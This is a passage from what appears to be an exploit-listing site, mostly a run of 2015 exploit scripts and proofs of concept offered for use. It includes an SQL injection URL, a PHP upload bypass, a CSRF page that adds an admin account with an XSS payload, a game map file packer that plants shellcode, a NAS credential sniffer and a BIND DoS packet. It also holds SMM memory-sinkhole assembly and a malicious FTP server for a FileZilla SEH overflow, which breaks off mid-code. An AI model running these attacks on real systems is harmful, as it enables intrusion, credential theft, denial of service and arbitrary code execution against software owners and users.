<../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n") recv(s) s.send("data\r\n") recv(s) s.send("From: milad@milad.pl\r\n") s.send("\r\n") s.send("'\n") s.send(payload + "\n") s.send("\r\n.\r\n") recv(s) s.send("quit\r\n") recv(s) s.close() print "[+]Done! Payload will be executed once somebody logs in." except: print "Connection failed."
HireHackking

PHP News Script 4.0.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: PHP News Script 4.0.0 Sql Injection # Date: 2015-08-01 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: http://phpnewsscript.com/ # Version: 4.0.0 # Tested on: CentOS Exploit : http://server/allgallery.php?id=-9999%27+[sql-command]+%23 Test : http://server/demo/allgallery.php?id=-100%27+union+select+user()%23
HireHackking
 Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution Vendor: Microweber Team Product web page: http://www.microweber.com Affected version: 1.0.3 Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed under Apache License, Version 2.0 which allows you to create your own website, blog or online shop. Desc: Microweber suffers from an authenticated arbitrary command execution vulnerability. The issue is caused due to the improper verification when uploading files in '/src/Microweber/functions/plupload.php' script. This can be exploited to execute arbitrary PHP code by bypassing the extension restriction by putting the dot character at the end of the filename and uploading a malicious PHP script file that will be stored in '/userfiles/media/localhost/uploaded' directory. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5250 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php 12.07.2015 -- PoC Requests: ------------- 1. POST /microweber-latest/plupload?token=1111111111222222222233333333334444444444&path=media%25255Clocalhost%25255C&path=media%255Clocalhost%255Cuploaded%255C HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 319 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqX83MP6Cg5JpA193 Accept: */* Referer: http://localhost/microweber-latest/editor_tools/plupload?type=explorer&filters=*&multiple=true&autostart=undefined&mwv=1.0.3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: mwui=%7B%22%23modules-and-layouts%2C%23tab_modules%2C.tst-modules%22%3A%22true%22%7D; recommend=%7B%22logo%22%3A1%7D; back_to_admin=http%3A//localhost/microweber-latest/admin/view%3Amodules/load_module%3Afiles%23path%3Dmedia%255Clocalhost%255Cuploaded%255C%26select-file%3Dhttp%3A//localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php; laravel_session=eyJpdiI6ImNYNnkyWjJkOXZyTVRDMXlcL0pKQzBRPT0iLCJ2YWx1ZSI6Ilp6QjhDYjRRMEY4NGR5RzVuZGNxSnd1V3dGQ1R6OVdaWjZrZStiT1Q2bVM3UmRoQjNrak1ORzV5bXZjbzVDSitqdVVkdzdqOFVQa2hZdWRwMlwvMSttZz09IiwibWFjIjoiNGQxYzkwOTk4YmIzNTgzNWRiZmZlOTM4N2I2MzA1NjIzODcwNWRmMWM5ZDcwN2YxMGJlZmQ2ZjUxYmMzNjVjOSJ9 ------WebKitFormBoundaryqX83MP6Cg5JpA193 Content-Disposition: form-data; name="name" phpinfo.php. ------WebKitFormBoundaryqX83MP6Cg5JpA193 Content-Disposition: form-data; name="file"; filename="phpinfo.php." Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryqX83MP6Cg5JpA193-- 2. GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1
HireHackking
<!DOCTYPE html> <!-- Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit Vendor: Microweber Team Product web page: http://www.microweber.com Affected version: 1.0.3 Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed under Apache License, Version 2.0 which allows you to create your own website, blog or online shop. Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Stored cross-site scripting vulnerabilitity is also discovered. The issue is triggered when input passed via the POST parameter 'option_value' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5249 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php 12.07.2015 --> <html> <title>Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit</title> <br /><br /> <body><center> <form action="http://localhost/microweber-latest/api/save_user" method="POST"> <input type="hidden" name="id" value="0" /> <input type="hidden" name="thumbnail" value="" /> <input type="hidden" name="username" value="Freakazoid" /> <input type="hidden" name="password" value="00110001" /> <input type="hidden" name="email" value="lab@zeroscience.mk" /> <input type="hidden" name="first_name" value="Joe" /> <input type="hidden" name="last_name" value="Black" /> <input type="hidden" name="is_active" value="1" /> <input type="hidden" name="is_admin" value="1" /> <input type="hidden" name="basic_mode" value="0" /> <input type="hidden" name="api_key" value="" /> <input type="submit" value="CSRF Adminize" /> </form> </body> </html> <br /><br /> <html> <body> <form action="http://localhost/microweber-latest/api/save_option" method="POST"> <input type="hidden" name="option_key" value="website_keywords" /> <input type="hidden" name="option_group" value="website" /> <input type="hidden" name="option_value" value='"><img src=j onerror=confirm("ZSL")>' /> <input type="submit" value="Store XSS" /> </form></center> </body> </html>
HireHackking

Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service

HACKER · %s · %s

# Exploit Title: OSX Keychain - EXC_BAD_ACCESS # Date: 22/07/2015 # Exploit Author: Juan Sacco # Vendor Homepage: https://www.apple.com # Software Link: https://www.apple.com/en/downloads/ # Version: 9.0 (55161) # Tested on: OSX Yosemite 10.10.4 # CVE : None # History - Reported to product-security@apple.com 20 Jul 2015 # Be careful: Crashing the Keychain will affect the user ability to use Keychain stored passwords. # How to reproduce it manually 1. Select a certificate, right click "New certificate preference.." 2. Under "Location or Email address:" add random values +9000 3. Click on Add to conduct the PoC manually # Technically: Performing @selector(addCertificatePreference:) from sender NSButton 0x608000148cf0 # Exception type Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_PROTECTION_FAILURE at 0x00007fff4d866828 External Modification Warnings: VM Regions Near 0x7fff4d866828: MALLOC_SMALL 00007f9e7d000000-00007f9e80000000 [ 48.0M] rw-/rwx SM=PRV --> STACK GUARD 00007fff4c7de000-00007fff4ffde000 [ 56.0M] ---/rwx SM=NUL stack guard for thread 0 Stack 00007fff4ffde000-00007fff507de000 [ 8192K] rw-/rwx SM=COW thread 0 (lldb) Process 490 resuming Process 490 stopped * thread #1: tid = 0x19b7, 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x7fff4d866828) frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325 Security`SecCertificateSetPreference: -> 0x7fff92c663c3 <+325>: callq 0x7fff92cf18b2 ; symbol stub for: CFStringGetCString 0x7fff92c663c8 <+330>: movq %rbx, -0x670(%rbp) 0x7fff92c663cf <+337>: testb %al, %al 0x7fff92c663d1 <+339>: jne 0x7fff92c663d8 ; <+346> Process: Keychain Access [598] Path: /Applications/Utilities/Keychain Access.app/Contents/MacOS/Keychain Access Identifier: com.apple.keychainaccess Version: 9.0 (55161) Build Info: KeychainAccess-55161000000000000~620 Code Type: X86-64 (Native) Parent Process: ??? [1] Responsible: Keychain Access [598] User ID: 501 Date/Time: 2015-07-28 13:32:05.183 +0200 OS Version: Mac OS X 10.10.4 (14E46) Report Version: 11 Anonymous UUID: 08523B58-1EF8-DC4A-A7D7-CB31074E4395 Crashed Thread: 0 Dispatch queue: com.apple.main-thread VM Regions Near 0x7fff507776c8: MALLOC_SMALL 00007ff93c800000-00007ff93e000000 [ 24.0M] rw-/rwx SM=PRV --> STACK GUARD 00007fff4e5d7000-00007fff51dd7000 [ 56.0M] ---/rwx SM=NUL stack guard for thread 0 Stack 00007fff51dd7000-00007fff525d7000 [ 8192K] rw-/rwx SM=COW thread 0 rax: 0x0000000001e5e1a0 rbx: 0x0000000000000006 rcx: 0x0000000008000100 rdx: 0x0000000001e5e1a0 rdi: 0x000060000045b6c0 rsi: 0x00007fff507776d0 rbp: 0x00007fff525d5f30 rsp: 0x00007fff507776d0 r8: 0x0000000000000000 r9: 0x00007fff79e6a300 r10: 0x00007ff93c019790 r11: 0x00007fff79147658 r12: 0x000000000000002d r13: 0x00007fff507776d0 r14: 0x00007fff525d5880 r15: 0x00007ff93ae41680 rip: 0x00007fff901083c3 rfl: 0x0000000000010202 cr2: 0x00007fff507776c8
HireHackking
/* # Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution # Date : 2015-07-29 # Exploit Author : John AAkerblom, Pierre Lindblad # Website: http://h3minternals.net # Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/ # Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9 # Tested on : Windows XP, Windows 8.1 # Category: exploits # Description: This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes of Might and Magic III. Once the map is started in-game, a buffer overflow occuring when loading object sprite names leads to shellcode execution. Only basic arbitrary code execution is covered in this PoC but is possible to craft an exploit that lets the game continue normally after the shellcode has been executed. Using extensive knowledge of the .h3m format, it is even possible to create a map file that loads like normal in the game's map editor (which lacks the vulnerability) but stealthily executes shellcode when opened in-game. */ #include <string.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> /* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/ 0xEBFE added at end. Note that a NULL-less payload is not actually needed Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com> and Peter Ferrie <peter.ferrie@gmail.com> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of the contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ static const uint8_t CALC_PAYLOAD[] = { 0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52, 0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C, 0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C, 0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01, 0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE }; /* * The memmem() function finds the start of the first occurrence of the * substring 'needle' of length 'nlen' in the memory area 'haystack' of * length 'hlen'. * * The return value is a pointer to the beginning of the sub-string, or * NULL if the substring is not found. * * Original author: caf, http://stackoverflow.com/a/2188951 */ static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen) { uint8_t needle_first; uint8_t *p = haystack; size_t plen = hlen; if (!nlen) return NULL; needle_first = *(uint8_t *)needle; while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1))) { if (!memcmp(p, needle, nlen)) return p; p++; plen = hlen - (p - haystack); } return NULL; } #ifdef _MSC_VER #pragma warning(disable:4996) // M$ fopen so unsafe #endif #pragma pack(push, 1) // exploit struct // .h3m files contain an array of object attributes - OA - in which each // entry starts with a string length and then a string for an object sprite. // This exploit overflows the stack with a malicious sprite name. struct exploit_oa_t { uint32_t size; // size of the rest of this struct, including shellcode // The rest of the struct is the sprite name for the OA, <size> bytes of // which an CALL ESP-gadget address is placed so that it overwrites the // return address, when ESP is called shellcode2 will be executed. An // additional 2 "anticrash" gadgets are needed so the game does not crash // before returning to the CALL ESP-gadget. uint8_t nullbyte; // Must be 0x00, terminating sprite name uint8_t overwritten[6]; // Overwritten by game uint8_t shellcode1[121]; // Mostly not used, some is overwritten uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack // anticrash_gadget1, needs to pass the following code down to final JMP: // // MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4] // XOR EBX, EBX // CMP EAX, EBX // JE SHORT <crash spot> ; JMP to crash if EAX is 0 // MOV CL, BYTE PTR DS : [EAX - 1] // CMP CL, BL // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0 // CMP CL, 0FF // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF // CPU Disasm // CMP EDI, EBX // JNE <good spot> ; JMP to good spot. Always occurs if we get this far uint32_t anticrash_gadget1; // anticrash_gadget2, needs to return out of the following call (tricky): // // MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2] // CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4] uint32_t anticrash_gadget2; // Here at 144 bytes into this struct comes the shellcode that will be // executed. For the game to survive, it is wise to use this only for a // short jmp as doing so means only 2 values have to be restored on the // stack. Namely: original return address and format value of the h3m. // This PoC simply puts shellcode here, meaning the game cannot continue // after shellcode execution. uint8_t shellcode2[]; }; struct offsets_t { uint32_t call_esp_gadget; uint32_t anticrash_gadget1; uint32_t anticrash_gadget2; }; #pragma pack(pop) static const struct offsets_t * const TARGET_OFFSETS[] = { (struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00", (struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00" }; #define TARGET_DESCS " 1: H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \ " 2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]" #define MAX_TARGET 2 // Name of a sprite present in all maps, this is overwritten with exploit #define NEEDLE "AVWmrnd0.def" int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size) { uint8_t *buf = NULL; uint8_t *p = NULL; long h3m_size = 0; long bytes = 0; struct exploit_oa_t *exp = NULL; // Read entire h3m file into memory fseek(h3m_f, 0, SEEK_END); h3m_size = ftell(h3m_f); rewind(h3m_f); buf = malloc(h3m_size); if (buf == NULL) { puts("[!] Failed to allocate memory"); return 1; } bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f); if (bytes != h3m_size) { free(buf); puts("[!] Failed to read all bytes"); return 1; } // Find game object array in .h3m, where we will overwrite the first entry p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1); if (p == NULL) { puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m"); free(buf); return 1; } // Move back 4 bytes from sprite name, pointing to the size of the sprite name p -= 4; // Overwrite the first game object with exploit exp = (struct exploit_oa_t *)p; exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size; exp->nullbyte = 0; exp->call_esp_gadget = ofs->call_esp_gadget; exp->anticrash_gadget1 = ofs->anticrash_gadget1; exp->anticrash_gadget2 = ofs->anticrash_gadget2; memcpy(exp->shellcode2, payload, payload_size); // Write entire file from memory and cleanup rewind(h3m_f); bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f); if (bytes != h3m_size) { free(buf); puts("[!] Failed to write all bytes"); return 1; } free(buf); return 0; } static void _print_usage(void) { puts("Usage: h3mpacker <uncompressed h3m filename> <target #>"); puts("Available targets:"); puts(TARGET_DESCS); puts("Examples:"); puts(" h3mpacker Arrogance.h3m 1"); puts(" h3mpacker Deluge.h3m 2"); } int main(int argc, char **argv) { FILE *h3m_f = NULL; int ret = 0; int target; if (argc != 3) { _print_usage(); return 1; } h3m_f = fopen(argv[1], "rb+"); target = strtoul(argv[2], NULL, 0); if (h3m_f == NULL || target < 1 || target > MAX_TARGET) { if (h3m_f != NULL) fclose(h3m_f); _print_usage(); return 1; } ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD)); fclose(h3m_f); if (ret != 0) return ret; printf("[+] Payload embedded into h3m file %s\n", argv[1]); return 0; }
HireHackking

T-Mobile Internet Manager - Contact Name Crash (PoC)

HACKER · %s · %s

#!/usr/bin/python # coding: utf-8 #[+] Author: SATHISH ARTHAR #[+] Exploit Title: T-Mobile Internet Manager Memory Corruption PoC #[+] Date: 30-07-2015 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows7/windows8 #[+] Vendor: https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html #[+] Download: https://www.t-mobile.de/downloads/neu/winui.zip #[+] Sites: sathisharthars.wordpress.com #[+] Twitter: @sathisharthars #[+] Thanks: offensive security (@offsectraining) print"###########################################################" print"# Title: T-Mobile Internet Manager Memory Corruption PoC #" print"# Author: SATHISH ARTHAR #" print"# Category: DoS/PoC # " print"###########################################################" print"Copy the content of CRASH.TXT in create new contacts and paste it in Name field" print" contacts -----> create new -----> Name ----> paste it " crash= "A" * 2000 filename = "CRASH.TXT" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" file.close()
HireHackking

Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure

HACKER · %s · %s

#!/usr/bin/env python # # Exploit Title: NETGEAR ReadyNAS LAN /dbbroker Credential Stealing # Date: 25/07/2015 # Exploit Author: St0rn # Vendor Homepage: www.netgear.fr/business/products/storage/readynas # Software Link: apps.readynas.com/pages/?page_id=143 # Version: Firmware 6.2.4 # ### Import ### from scapy.all import * from sys import argv,exit from os import system ### Clear Function ### def clear(): system("/usr/bin/clear") ### Function to get and decode credential ### def getReadyNASCredz(p): if p.haslayer(TCP) and p[IP].dst==argv[2]: if p.haslayer(Raw): if "POST /dbbroker" in p[Raw].load: tmp=p[Raw].load credz=tmp.split("\r\n") for i in credz: if "Authorization: Basic" in i: print "-----------------".center(80) print i.split(" ")[2].decode("base64").center(80) ### Main ### if __name__ == '__main__': clear() if len(argv)<3: print "Usage: %s [device] [NAS_IP]" %(argv[0]) exit(0) else: print "\n" print "#################".center(80) print "#G0 t0 G3t Cr3dZ#".center(80) print "#################\n".center(80) sniff(prn=getReadyNASCredz,iface=argv[1])
HireHackking

ISC BIND 9 - TKEY Remote Denial of Service (PoC)

HACKER · %s · %s

#!/usr/bin/env python # Exploit Title: PoC for BIND9 TKEY DoS # Exploit Author: elceef # Software Link: https://github.com/elceef/tkeypoc/ # Version: ISC BIND 9 # Tested on: multiple # CVE : CVE-2015-5477 import socket import sys print('CVE-2015-5477 BIND9 TKEY PoC') if len(sys.argv) < 2: print('Usage: ' + sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' + sys.argv[1] + ' ...') payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (sys.argv[1], 53)) print('Done.')
HireHackking

Linux Kernel (x86) - Memory Sinkhole Privilege Escalation

HACKER · %s · %s

; memory sinkhole proof of concept ; hijack ring -2 execution through the apic overlay attack. ; deployed in ring 0 ; the SMBASE register of the core under attack TARGET_SMBASE equ 0x1f5ef800 ; the location of the attack GDT. ; this is determined by which register will be read out of the APIC ; for the GDT base. the APIC registers at this range are hardwired, ; and outside of our control; the SMM code will generally be reading ; from APIC registers in the 0xb00 range if the SMM handler is page ; aligned, or the 0x300 range if the SMM handler is not page aligned. ; the register will be 0 if the SMM handler is aligned to a page ; boundary, or 0x10000 if it is not. GDT_ADDRESS equ 0x10000 ; the value added to SMBASE by the SMM handler to compute the ; protected mode far jump offset. we could eliminate the need for an ; exact value with a nop sled in the hook. FJMP_OFFSET equ 0x8097 ; the offset of the SMM DSC structure from which the handler loads ; critical information DSC_OFFSET equ 0xfb00 ; the descriptor value used in the SMM handler’s far jump DESCRIPTOR_ADDRESS equ 0x10 ; MSR number for the APIC location APIC_BASE_MSR equ 0x1b ; the target memory address to sinkhole SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000) ; we will hijack the default SMM handler and point it to a payload ; at this physical address. PAYLOAD_OFFSET equ 0x1000 ; compute the desired base address of the CS descriptor in the GDT. ; this is calculated so that the fjmp performed in SMM is perfectly ; redirected to the payload hook at PAYLOAD_OFFSET. CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET) ; we target the boot strap processor for hijacking. APIC_BSP equ 0x100 ; the APIC must be activated for the attack to work. APIC_ACTIVE equ 0x800 ;;; begin attack ;;; ; clear the processor caches, ; to prevent bypassing the memory sinkhole on data fetches wbinvd ; construct a hijack GDT in memory under our control ; note: assume writing to identity mapped memory. ; if non-identity mapped, translate these through the page tables first. mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4], (CS_BASE&0xff000000) | (0x00cf9a00) | (CS_BASE&0x00ff0000)>>16 mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0], (CS_BASE&0x0000ffff)<<16 | 0xffff ; remap the APIC to sinkhole SMM’s DSC structure mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP mov edx, 0 mov ecx, APIC_BASE_MSR wrmsr ; wait for a periodic SMI to be triggered jmp $
HireHackking

FileZilla Client 2.2.x - Remote Buffer Overflow (SEH)

HACKER · %s · %s

# Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit # Date: 02/08/2015 # Exploit Author: ly0n # Vendor Homepage: filezilla-project.org/ # Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90 # Version: tested on filezilla 2.2.21 # Tested on: Windows XP sp3 english #!/usr/bin/env python2 # coding: utf-8 import os,socket,threading,time #import traceback # visit: ly0n.me # greetz: NBS #MSGBOX "BrokenByte" msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74" "\x69\x30\x68\x5e\x58\x65\x63\x89" "\xe3\x68\x20\x20\x20\x00\x68\x68" "\x65\x72\x65\x68\x77\x61\x73\x20" "\x68\x6e\x33\x72\x20\x68\x75\x74" "\x69\x30\x68\x5e\x58\x65\x63\x89" "\xe1\x31\xc0\x50\x53\x51\x50\x50" "\xbe\xea\x07\x45\x7e\xff\xe6\x31" "\xc0\x50\xb8\x12\xcb\x81\x7c\xff" "\xe0") nops = "\x90" * 100 #77EA9CAC POP POP RET kernel32.dll <- seh #EB069090 SHORT JUMP 6 POS + 2 NOPS <- nseh nseh = "\xeb\x06\x90\x90" seh = "\xAC\x9C\xEA\x77" allow_delete = False local_ip = "192.168.11.6" #SERVER LOCAL IP local_port = 21 #DESIRED PORT buffer1 = "\x41" * 1896 + nseh + seh + nops + msgbox + nops buffer = buffer1 + ".txt" currdir=os.path.abspath('.') class FTPserverThread(threading.Thread): def __init__(self,(conn,addr)): self.conn=conn self.addr=addr self.basewd=currdir self.cwd=self.basewd self.rest=False self.pasv_mode=False threading.Thread.__init__(self) def run(self): self.conn.send('220 Welcome!\r\n') while True: cmd=self.conn.recv(256) if not cmd: break else: print 'Recieved:',cmd try: func=getattr(self,cmd[:4].strip().upper()) func(cmd) except Exception,e: print 'ERROR:',e #traceback.print_exc() self.conn.send('500 Sorry.\r\n') def SYST(self,cmd): self.conn.send('215 UNIX Type: L8\r\n') def OPTS(self,cmd): if cmd[5:-2].upper()=='UTF8 ON': self.conn.send('200 OK.\r\n') else: self.conn.send('451 Sorry.\r\n') def USER(self,cmd): self.conn.send('331 OK.\r\n') def PASS(self,cmd): self.conn.send('230 OK.\r\n') #self.conn.send('530 Incorrect.\r\n') def QUIT(self,cmd): self.conn.send('221 Goodbye.\r\n') def NOOP(self,cmd): self.conn.send('200 OK.\r\n') def TYPE(self,cmd): self.mode=cmd[5] self.conn.send('200 Binary mode.\r\n') def CDUP(self,cmd): if not os.path.samefile(self.cwd,self.basewd): #learn from stackoverflow self.cwd=os.path.abspath(os.path.join(self.cwd,'..')) self.conn.send('200 OK.\r\n') def PWD(self,cmd): cwd=os.path.relpath(self.cwd,self.basewd) if cwd=='.': cwd='/' else: cwd='/'+cwd self.conn.send('257 \"%s\"\r\n' % cwd) def CWD(self,cmd): chwd=cmd[4:-2] if chwd=='/': self.cwd=self.basewd elif chwd[0]=='/': self.cwd=os.path.join(self.basewd,chwd[1:]) else: self.cwd=os.path.join(self.cwd,chwd) self.conn.send('250 OK.\r\n') def PORT(self,cmd): if self.pasv_mode: self.servsock.close() self.pasv_mode = False l=cmd[5:].split(',') self.dataAddr='.'.join(l[:4]) self.dataPort=(int(l[4])<<8)+int(l[5]) self.conn.send('200 Get port.\r\n') def PASV(self,cmd): # from http://goo.gl/3if2U self.pasv_mode = True self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) self.servsock.bind((local_ip,0)) self.servsock.listen(1) ip, port = self.servsock.getsockname() print 'open', ip, port self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' % (','.join(ip.split('.')), port>>8&0xFF, port&0xFF)) def start_datasock(self): if self.pasv_mode: self.datasock, addr = self.servsock.accept() print 'connect:', addr else: self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) self.datasock.connect((self.dataAddr,self.dataPort)) def stop_datasock(self): self.datasock.close() if self.pasv_mode: self.servsock.close() def LIST(self,cmd): self.conn.send('150 Here comes the directory listing.\r\n') print 'list:', self.cwd self.start_datasock() dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10" +buffer1+"\r\n\n" dirlist += "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 "+buffer+" \r\n\n" self.datasock.send("total 2\r\n"+dirlist) self.stop_datasock() self.conn.send('226 Directory send OK.\r\n') def toListItem(self,fn): st=os.stat(fn) fullmode='rwxrwxrwx' mode='' for i in range(9): mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-' d=(os.path.isdir(fn)) and 'd' or '-' ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime)) return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn) def MKD(self,cmd): dn=os.path.join(self.cwd,cmd[4:-2]) os.mkdir(dn) self.conn.send('257 Directory created.\r\n') def RMD(self,cmd): dn=os.path.join(self.cwd,cmd[4:-2]) if allow_delete: os.rmdir(dn) self.conn.send('250 Directory deleted.\r\n') else: self.conn.send('450 Not allowed.\r\n') def DELE(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) if allow_delete: os.remove(fn) self.conn.send('250 File deleted.\r\n') else: self.conn.send('450 Not allowed.\r\n') def RNFR(self,cmd): self.rnfn=os.path.join(self.cwd,cmd[5:-2]) self.conn.send('350 Ready.\r\n') def RNTO(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) os.rename(self.rnfn,fn) self.conn.send('250 File renamed.\r\n') def REST(self,cmd): self.pos=int(cmd[5:-2]) self.rest=True self.conn.send('250 File position reseted.\r\n') def RETR(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/') print 'Downlowding:',fn if self.mode=='I': fi=open(fn,'rb') else: fi=open(fn,'r') self.conn.send('150 Opening data connection.\r\n') if self.rest: fi.seek(self.pos) self.rest=False data= fi.read(1024) self.start_datasock() while data: self.datasock.send(data) data=fi.read(1024) fi.close() self.stop_datasock() self.conn.send('226 Transfer complete.\r\n') def STOR(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) print 'Uplaoding:',fn if self.mode=='I': fo=open(fn,'wb') else: fo=open(fn,'w') self.conn.send('150 Opening data connection.\r\n') self.start_datasock() while True: data=self.datasock.recv(1024) if not data: break fo.write(data) fo.close() self.stop_datasock() self.conn.send('226 Transfer complete.\r\n') class FTPserver(threading.Thread): def __init__(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.bind((local_ip,local_port)) threading.Thread.__init__(self) def run(self): self.sock.listen(5) while True: 